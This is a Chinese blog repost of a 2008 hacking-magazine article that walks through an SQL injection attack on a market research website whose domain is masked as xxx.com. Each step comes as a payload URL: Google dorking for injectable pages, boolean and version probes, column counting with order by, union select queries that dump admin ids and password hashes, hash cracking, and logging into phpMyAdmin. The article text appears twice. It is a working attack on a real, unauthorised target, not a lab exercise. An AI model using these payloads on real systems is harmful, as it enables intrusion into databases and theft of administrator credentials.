=波波日志 > 黑客技术 > 进行php渗透=
[转]进行php渗透
作者:Maxil
已经发表在黑客手册2008年第三期
最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com.一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!!
在google中搜索php?id= site:xxx.com.意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个.http://app.xxx.com/cati/article_literature.php?id=11.打开吓我一条,它页面本身就存在错误直接出来了绝对路径.
/data01/www/cati/article_literature.php 呵呵,人品爆发了..通过路径可以得知是台Linux主机.判断下是否可以进行注射.and 1=1返回正常,and 1=2返回错误..OK存在注射.然后我们判断数据库,不出意外应该是mysql.传说中的LMAP.环境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx.com/cati/article_literature.php?id=11/*在后面加上/*,返回正常则是Mysql.因为/*是Mysql的注释标记.
返回正常,确定是Mysql的数据库.现在我们来检测下Mysql的版本.4.0以上支持union联合查询.一般都回是4.0已经.为什么.因为Mysql是开源的数据库不收费傻子才不更新呢.呵呵.
http://app.xxx.com/cati/article_literature.php?id=11and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.OK.我们来爆它的字段.
http://app.xxx.com/cati/article_literature.php?id=11order by 10
http://app.xxx.com/cati/article_literature.php?id=11order by 9
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,2,3,4,5,6,7,8,9
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin
我们去CMD5.com看看…
http://app.xxx.com/cati/article_literature.php?id=11and (select count(*) from mysql.user)>0 /*
OK.我们去登陆phpmyadmin测试下吧.哈哈.
已经发表在黑客手册2008年第三期
最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com.一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!!
在google中搜索php?id= site:xxx.com.意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个.http://app.xxx.com/cati/article_literature.php?id=11.打开吓我一条,它页面本身就存在错误直接出来了绝对路径.
/data01/www/cati/article_literature.php 呵呵,人品爆发了..通过路径可以得知是台Linux主机.判断下是否可以进行注射.and 1=1返回正常,and 1=2返回错误..OK存在注射.然后我们判断数据库,不出意外应该是mysql.传说中的LMAP.环境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx.com/cati/article_literature.php?id=11/*在后面加上/*,返回正常则是Mysql.因为/*是Mysql的注释标记.
返回正常,确定是Mysql的数据库.现在我们来检测下Mysql的版本.4.0以上支持union联合查询.一般都回是4.0已经.为什么.因为Mysql是开源的数据库不收费傻子才不更新呢.呵呵.
http://app.xxx.com/cati/article_literature.php?id=11and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.OK.我们来爆它的字段.
http://app.xxx.com/cati/article_literature.php?id=11order by 10
http://app.xxx.com/cati/article_literature.php?id=11order by 9
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,2,3,4,5,6,7,8,9
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin
http://app.xxx.com/cati/article_literature.php?id=11and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin
我们去CMD5.com看看…
http://app.xxx.com/cati/article_literature.php?id=11and (select count(*) from mysql.user)>0 /*
OK.我们去登陆phpmyadmin测试下吧.哈哈.
OK。现在可以去做我们想做的事了。
类别:黑客技术 作者:转载 日期:2009-09-01 【评论:0】
暂时没有评论!
发表留言
百度赞助
同类热门博文
- ·翻墙软件组合:FireF..
- ·狗日的us-hacker@ho..
- ·JS/Exploit-DialogA..
- ·QQ输入状态漏洞,让..
- ·关于adodb.stream的..
- ·DDoS攻击使用的常用..
- ·晓风内核 彩票整站平..
- ·如何在 Internet Ex..
博格Tag
- flash/flex/fcs/AIR(752)
- Asp.Net/C#/WCF(598)
- 操作系统及应用软件(376)
- JavaScript/Ajax(330)
- SQL及数据库(134)
- 黑客技术(115)
- Asp/VBScript(111)
- HTML/WML/CSS兼容/XML(102)
- PHP/apache/Perl(96)
- 网站排名及优化(92)
- 其他(75)
- showbo日志(66)
- lucene.net/分词技术(33)
- 计算机网络(26)
- 机械重工(26)
- C#设计模式(24)
- Google Maps开发(17)
- 日语学习(15)
- Canvas/VML/SVG(13)
- linux(11)
- 游戏开发(8)
- 正则表达式(5)
- Jsp/Java(4)
最新博文
- ·ad.zom123.net弹窗木..
- ·如何截获浏览器密码..
- ·破解查看IE浏览器保..
- ·Ewebeditor漏洞整理..
- ·获取最新穿墙软件的..
- ·翻墙工具下载地址
- ·图解软件破解详细步..
- ·软件破解步骤
随机博文